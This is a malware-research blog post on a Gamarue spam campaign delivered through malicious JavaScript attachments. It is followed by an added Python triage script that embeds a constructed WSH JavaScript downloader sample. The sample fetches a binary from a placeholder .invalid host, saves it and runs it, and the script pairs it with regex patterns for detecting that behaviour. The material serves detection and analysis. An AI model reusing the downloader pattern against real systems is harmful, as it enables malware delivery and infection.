In the malware ecosystem, some old malware families are able to adapt their propagation methods and successfully continue to infect many users. Gamarue (aka Andromeda) is one of them. I will explain here how this new Gamarue campaign spreads via malicious JavaScript in spam emails.

Early in April, I was poked via Twitter regarding a spamming campaign in progress: yet another malware dropped via emails and malicious JavaScript. The archive attached to these emails contains a JavaScript file which downloads and executes a payload hosted on the Internet: this payload is a good old Gamarue.

Gamarue (or Andromeda) is a well-known modular malware. Basically, Gamarue is a dropper which drops different modules. Since it is easy to develop a new module, Gamarue is loved by crooks. Don’t worry, this article is not another Gamarue analysis; a lot of great articles are already available: /andromeda-under-the-microscope, /andromeda-bot-analysis/ & /blog/yet-another-andromeda-gamarue-analysis. I’m not a big expert on Gamarue, so I have some difficulty identifying the version of the malware.
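The dropper chain described above (archive, JavaScript file, download, execute) is usually triaged statically before anyone runs it. The Python below is an added example, not the campaign's script and not code from the original post: it folds the string concatenation these Windows Script Host downloaders use to hide their URL, lists the COM objects they instantiate, and flags the fetch-write-run pattern. The JavaScript sample, its URL (a reserved .invalid host) and the file names are constructed for illustration and are not indicators from the campaign.

```python
import re

# Constructed sample, NOT the campaign's real script: a minimal WSH
# JavaScript downloader of the kind the post describes. The URL and
# file names are assumptions made up for this example.
SAMPLE_JS = r'''
var u = "http://" + "example" + ".invalid" + "/load.exe";
var x = new ActiveXObject("MSXML2.XMLHTTP");
x.open("GET", u, false);
x.send();
var s = new ActiveXObject("ADODB.Stream");
s.Open(); s.Type = 1; s.Write(x.responseBody);
var p = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") + "\\svc.exe";
s.SaveToFile(p, 2);
new ActiveXObject("WScript.Shell").Run(p);
'''

# Constructed benign script used as a negative control.
BENIGN_JS = r'''
var d = new Date();
WScript.Echo("today is " + d.toDateString());
'''

# Two adjacent string literals joined by "+": "a" + "b"
CONCAT = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')
# ProgIDs handed to ActiveXObject(...) or WScript.CreateObject(...)
PROGID = re.compile(r'(?:ActiveXObject|CreateObject)\(\s*"([^"]+)"\s*\)')
# Plain http(s) URLs left after concatenation has been folded
URL = re.compile(r'\bhttps?://[^\s"\'<>)]+', re.I)


def fold_concats(js):
    """Repeatedly join adjacent literal strings: "a" + "b" + "c" -> "abc"."""
    while True:
        new = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', js)
        if new == js:
            return js
        js = new


def triage(js):
    """Static triage of a WSH JavaScript file; returns the indicators found."""
    folded = fold_concats(js)
    progids = sorted(set(PROGID.findall(folded)))
    urls = sorted(set(URL.findall(folded)))
    # Fetch: an XMLHTTP or WinHttpRequest object; write: ADODB.Stream.SaveToFile;
    # run: WScript.Shell.Run/Exec. All three together is the downloader pattern.
    fetches = any(p.upper().endswith("XMLHTTP") for p in progids) or "WinHttpRequest" in folded
    writes_file = "SaveToFile" in folded
    runs_binary = re.search(r'\.(?:Run|Exec)\s*\(', folded) is not None
    return {
        "urls": urls,
        "progids": progids,
        "writes_file": writes_file,
        "runs_binary": runs_binary,
        "downloader": fetches and writes_file and runs_binary,
    }


if __name__ == "__main__":
    for name, js in (("sample", SAMPLE_JS), ("benign", BENIGN_JS)):
        print(name, triage(js))
```

The folding step is deliberately dumb: it only handles literal-plus-literal, which is enough for the common "split the URL into pieces" trick, and it never evaluates the script. Anything the regexes cannot see (character-code arrays, `eval` of a decoded blob) has to be handled with a proper deobfuscation pass or in a sandbox, so treat a negative result as "no simple indicators", not as clean.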